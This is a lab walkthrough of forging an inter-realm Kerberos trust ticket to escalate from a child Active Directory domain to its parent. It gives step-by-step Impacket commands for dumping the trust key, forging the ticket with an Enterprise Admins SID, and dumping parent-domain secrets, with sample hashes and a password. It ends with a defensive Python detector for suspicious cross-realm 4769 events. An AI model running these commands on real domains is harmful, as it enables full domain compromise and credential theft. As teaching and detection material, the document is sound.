Trust ticket - forge inter-realm TGT

  • Another way to escalate from child to parent is to extract the trust key and use it to forge our own trust ticket (a very good explanation, with Mimikatz examples, can be found here: https://adsecurity.org/?p=1588)

  • The trust key is the NT hash of the trust account, whose name is the NetBIOS name of the trusted domain followed by `$` (here NEWYORK$ in north.newyork.local); it can be dumped from the NTDS by targeting just that account

secretsdump.py -just-dc-user 'NEWYORK$' \
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11

Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
newyork$:1105:aad3b435b51404eeaad3b435b51404ee:59f1453dcd3f2fdc8c52f38693806154:::
[*] Kerberos keys grabbed
newyork$:aes256-cts-hmac-sha1-96:8d20b70ca945f979ff4ac5928e6f7397b43a3737ac9b1ee2579294c584bbe49e
newyork$:aes128-cts-hmac-sha1-96:05c2cc6747982c155cc82ccae92b8475
newyork$:des-cbc-md5:6e647ff89b08b089
[*] Cleaning up...
  • Now that we have the trust key, we can forge the ticket just as we did with the krbtgt hash, but this time we set the SPN to krbtgt/parent_domain

# -nthash: the newyork$ trust key dumped above
# -domain-sid: SID of the child domain north.newyork.local
# -extra-sid: SID of the parent domain newyork.local with RID 519 (Enterprise Admins) appended
ticketer.py -nthash 59f1453dcd3f2fdc8c52f38693806154 \
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \
 -spn krbtgt/newyork.local trustfakeuser
  • Now we use the forged inter-realm TGT to request a service ticket (ST) from the parent domain

export KRB5CCNAME=/home/jefe/delegation/trustfakeuser.ccache

getST.py -k -no-pass -spn cifs/nyc.newyork.local \
 newyork.local/trustfakeuser@newyork.local -debug
  • And now we can use our service ticket :)

  • connect with smbclient

export KRB5CCNAME=/workspace/trusts/trustfakeuser@newyork.local@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
smbclient.py -k -no-pass trustfakeuser@nyc.newyork.local
  • or even dump secrets

secretsdump.py -k -no-pass -just-dc-ntlm trustfakeuser@nyc.newyork.local
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
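From the defender's side, the weak point of this technique is visible in the parent domain's logs: the forged TGT names a principal (trustfakeuser above) that the child domain never created, yet the parent KDC logs a 4769 service-ticket request for `user@CHILD.REALM` as if it came through the trust. The script below is an added example, not part of this page or of Impacket; it assumes the 4769 XML field names and the `user@REALM` account form the parent DC logs for cross-realm requests, and uses constructed events and a constructed child-domain account inventory.

```python
"""Flag cross-realm 4769 service-ticket requests on the parent DC whose
requesting principal does not exist in the child realm it claims to come
from (the fingerprint of a forged inter-realm TGT with an invented user).
Assumption: the per-realm account inventory is exported separately."""

LOCAL_REALM = "NEWYORK.LOCAL"   # realm of the DC whose 4769 events we read

# Constructed sample 4769 events (not real log data). For cross-realm
# requests the parent DC logs TargetUserName as user@CHILD.REALM.
SAMPLE_4769_EVENTS = [
    {"TargetUserName": "fernando.alonzo@NORTH.NEWYORK.LOCAL",
     "ServiceName": "NYC$", "IpAddress": "::ffff:192.168.56.11"},
    {"TargetUserName": "trustfakeuser@NORTH.NEWYORK.LOCAL",   # invented user
     "ServiceName": "NYC$", "IpAddress": "::ffff:192.168.56.50"},
    {"TargetUserName": "Administrator",                        # same realm
     "ServiceName": "NYC$", "IpAddress": "::ffff:192.168.56.10"},
    {"TargetUserName": "svc@OTHER.REALM",                      # no inventory
     "ServiceName": "NYC$", "IpAddress": "::ffff:192.168.56.99"},
]

# Constructed inventory of sAMAccountNames (lower-cased) per trusted realm.
KNOWN_ACCOUNTS = {
    "NORTH.NEWYORK.LOCAL": {"fernando.alonzo", "north$", "newyork$"},
}


def split_principal(target_user_name, local_realm=LOCAL_REALM):
    """Split 'user@REALM' into (user, REALM); names without '@' are local."""
    if "@" not in target_user_name:
        return target_user_name, local_realm
    user, realm = target_user_name.rsplit("@", 1)
    return user, realm.upper()


def find_unknown_cross_realm_principals(events, known_accounts,
                                        local_realm=LOCAL_REALM):
    """Return (event, reason) pairs for cross-realm requests to investigate."""
    findings = []
    for ev in events:
        user, realm = split_principal(ev["TargetUserName"], local_realm)
        if realm == local_realm:
            continue                      # not a referral through a trust
        inventory = known_accounts.get(realm)
        if inventory is None:
            findings.append((ev, "no account inventory for realm " + realm))
        elif user.lower() not in inventory:
            findings.append((ev, "principal not present in " + realm))
    return findings


if __name__ == "__main__":
    for ev, why in find_unknown_cross_realm_principals(SAMPLE_4769_EVENTS, KNOWN_ACCOUNTS):
        print(ev["TargetUserName"], ev["IpAddress"], "->", why)
```

Within a single forest, SID filtering is not applied on parent-child trusts, so the extra SID in the PAC is accepted and this log-side check (together with alerting on RID 519 in SID history) is the practical control.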
